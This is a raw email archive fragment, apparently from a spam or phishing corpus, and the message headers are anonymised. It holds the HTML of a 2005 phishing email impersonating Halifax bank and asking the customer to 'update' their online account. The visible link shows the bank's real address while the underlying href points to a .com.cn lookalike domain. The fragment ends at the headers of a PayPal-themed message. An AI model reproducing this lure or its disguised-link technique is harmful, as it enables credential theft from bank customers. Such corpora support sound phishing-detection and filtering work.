	* -1.4 AWL AWL: From: address is in the auto white-list
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 42

----059967829412850068
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0">
  <tbody> 
  <tr>
<td class=3D"HeaderCell" align=3D"left" height=3D"57" bgcolor=3D"#6699FF">=

<table border=3D"0" cellpadding=3D"0" cellspacing=3D"0" width=3D"100=
%">
<tbody><tr>
<td align=3D"left" nowrap width=3D"363">
<img src=3D"https://www.halifax-online.co.uk/LookAndFeel/images/Halifax/hx=
givingyouextra.gif" alt=3D"Online Logo" height=3D"45" width=3D"273"></td>
<td align=3D"left" nowrap width=3D"363">
<p align=3D"center"><b><font size=3D"3" color=3D"#FFFFFF" face=3D"Arial">I=
MPORTANT 
NOTICE</font></b></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td align=3D"left" valign=3D"top">
&nbsp;<p><font face=3D"Arial" size=3D"2">Dear Halifax Customer,</font></p>=

<p><font face=3D"Arial" size=3D"2">This mail is to inform you about the im=
portant 
urgent updates of our service<br>
you are requested to please follow the link below and update your HALIFAX<=
br>
ONLINE account.</font></p>
<p><font face=3D"Arial" size=3D"2"><img src=3D"https://www.halifax-online.=
co.uk/LookAndFeel/images/arrow_right.gif" border=3D"0" width=3D"8" height=3D=
"9"><a href=3D"http://halifax.secure-validations.com.cn/Halifax/secure/log=
in/index.php">https://www.halifax-online.co.uk/_mem_bin/formslogin.asp?Upd=
ate_Account</a></font></p>
<p>&nbsp;</p>
<p><font face=3D"Arial" size=3D"2">Thanks</font></p>
<p><font face=3D"Arial" size=3D"2">M. Mark Johnson<br>
<i>(Security &amp; Fraud Update Incharge)<br>
Halifax Online Banking Ltd.</i></font></p><hr size=3D"1">
<p><font face=3D"Arial" color=3D"#808080" size=3D"2">Please feel free to c=
all us 
anytime 24/7 at 08456 02 00 00 for support<br>
Mail ID: mhfx-update-02.845/-93</font></p></td>
</tr>
</tbody></table>

----059967829412850068--

From nobody@bluemarble.net  Sun Nov 27 18:50:18 2005
Return-Path: <nobody@bluemarble.net>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id B27C7536F40
	for <nobody@login.example.com>; Sun, 27 Nov 2005 18:50:18 -0500 (EST)
Received: from mail1.example.com (localhost.example.com [127.0.0.1])
	by mail1.example.com (Postfix) with ESMTP id DA9BD6CCE3B
	for <nobody@example.com>; Sun, 27 Nov 2005 18:50:17 -0500 (EST)
Received: from blackmagic.bluemarble.net (unixweb.bluemarble.net [204.89.253.23])
	by mail1.example.com (Postfix) with ESMTP
	for <nobody@example.com>; Sun, 27 Nov 2005 18:50:17 -0500 (EST)
Received: by blackmagic.bluemarble.net (Postfix, from userid 65534)
	id 661BE25A72; Sun, 27 Nov 2005 18:50:17 -0500 (EST)
To: nobody@example.com
Subject: Get Important Reminders with PayPal© Alerts
